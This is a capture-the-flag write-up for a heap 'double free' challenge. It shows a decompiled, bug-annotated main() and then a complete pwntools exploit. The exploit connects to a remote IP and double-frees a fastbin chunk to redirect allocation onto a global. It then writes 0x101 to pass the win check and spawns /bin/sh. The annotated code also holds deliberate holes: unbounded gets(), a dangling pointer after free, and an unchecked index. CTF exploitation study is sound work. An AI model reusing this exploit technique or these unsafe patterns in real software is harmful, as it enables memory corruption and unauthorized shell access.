pwn-堆(double free)
heap_Double_Free
// Decompiled (IDA-style) main() of the challenge binary. Menu loop:
//   1 = malloc a chunk into ptr[ID] and fill it with gets()
//   2 = free ptr[ID]
//   3 = puts ptr[ID]
//   anything else = spawn a shell if globals1[4] == 0x101, otherwise exit.
// init(), Menu() and the globals1 array are defined outside this listing.
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // ebx
int Choice; // [rsp+4h] [rbp-7Ch] BYREF
int ID; // [rsp+8h] [rbp-78h] BYREF  -- not initialized before its first use in "ID %= 10" below
int size; // [rsp+Ch] [rbp-74h] BYREF
char *ptr[10]; // [rsp+10h] [rbp-70h] BYREF  -- chunk table; only indices 0..9 are in bounds
unsigned __int64 v8; // [rsp+68h] [rbp-18h]
// Stack-protector canary load (fs:0x28); IDA shows only the store.
v8 = __readfsqword(0x28u);
init();
globals1[0] = 0;
globals1[2] = 113;
// Note: globals1[4], the value tested before the shell branch, is never written by
// this function (init() is not visible here).
memset(ptr, 0, sizeof(ptr));
while ( 1 )
{
while ( 1 )
{
Menu();
printf("root@ubuntu:~/Desktop$ ");
__isoc99_scanf("%d", &Choice);
// BUG: this is the only range reduction of ID, and it runs BEFORE a new ID is read by
// the scanf calls below, so every ptr[ID] access in this loop uses an unchecked value
// (a negative ID also stays negative under '%'). The fix is a 0 <= ID < 10 check
// immediately after each scanf that reads ID.
ID %= 10;
if ( Choice != 1 )
break;
puts("please input id and size :");
__isoc99_scanf("%d", &ID);
__isoc99_scanf("%d%*c", &size); // %*c discards the newline left before gets()
v3 = ID;
// malloc's result is not checked, and 'size' is a signed int passed straight through.
ptr[v3] = (char *)malloc(size);
puts("please input contet:");
// BUG: gets() is unbounded, so a line longer than 'size' overflows the heap chunk
// (and, if malloc failed, writes through NULL). fgets(ptr[ID], size, stdin) bounds it.
gets(ptr[ID]);
}
if ( Choice == 2 )
{
puts("please input id :");
__isoc99_scanf("%d", &ID);
// BUG: ptr[ID] is left dangling after free, so freeing the same id twice is a double
// free (the challenge's name). Mitigation: set ptr[ID] = NULL after free and reject
// NULL entries here and in option 3.
free(ptr[ID]);
}
else if ( Choice == 3 )
{
puts("please input id :");
__isoc99_scanf("%d", &ID);
// ptr[ID] may be NULL (never allocated) or already freed: NULL deref / use-after-free read.
puts(ptr[ID]);
}
else
{
// Win condition: since main never writes globals1[4], this branch is reachable only
// if that global has been changed elsewhere (e.g. through the heap bugs above).
if ( globals1[4] != 0x101 )
{
printf("exit!");
exit(0);
}
puts("your are got it!");
system("/bin/sh");
}
}
}
exp
from pwn import *
#r = process("./heap_Double_Free")
# Connection to the write-up's remote instance; use the commented-out process()
# line above to run the local binary instead.
r = remote("1.95.36.136", 2138)
context(log_level='debug')  # echo every send/recv; useful when a recvuntil() marker does not match
def molloc(id: int, size: int, content: bytes) -> None:
    """Menu option 1 on the target: allocate slot `id` with `size` bytes, then send `content`.

    Each send waits for the exact prompt the target's main() prints, so a
    mismatched prompt string hangs in recvuntil().
    """
    r.recvuntil(b"root@ubuntu:~/Desktop$ ")
    r.sendline(b'1')
    r.recvuntil(b"please input id and size :\n")
    r.sendline(str(id).encode())
    r.sendline(str(size).encode())
    r.recvuntil(b"please input contet:\n")
    r.sendline(content)  # this line is what the target reads with gets()
def free(id: int) -> None:
    """Menu option 2 on the target: free slot `id` (the target does not clear the slot)."""
    r.recvuntil(b"root@ubuntu:~/Desktop$ ")
    r.sendline(b"2")
    r.recvuntil(b"please input id :\n")
    r.sendline(str(id).encode())
def shell() -> None:
    """Send menu choice 4, which the target's main() routes to its exit/shell branch."""
    r.recvuntil(b"root@ubuntu:~/Desktop$ ")
    r.sendline(b"4")
# Three allocations in slots 0-2, then slot 0 is freed twice around slot 1 —
# the double free that the target's option 2 permits because it never clears ptr[ID].
molloc(0, 0x68, b'a' * 0x68)
molloc(1, 0x68, b'a' * 0x68)
molloc(2, 0x68, b'a' * 0x68)
free(0)
free(1)
free(0)
# Remaining allocations and their contents are as given in the write-up; 0x101 is the
# constant main() compares globals1[4] against. 0x6010A0 is presumably an address
# inside the binary's globals — confirm against its symbol table.
molloc(3,0x68,p64(0x6010A0))
molloc(4,0x68,b'a')
molloc(5,0x68,b'a')
molloc(6,0x68,p64(0x101))
shell()
#gdb.attach(r)
r.interactive()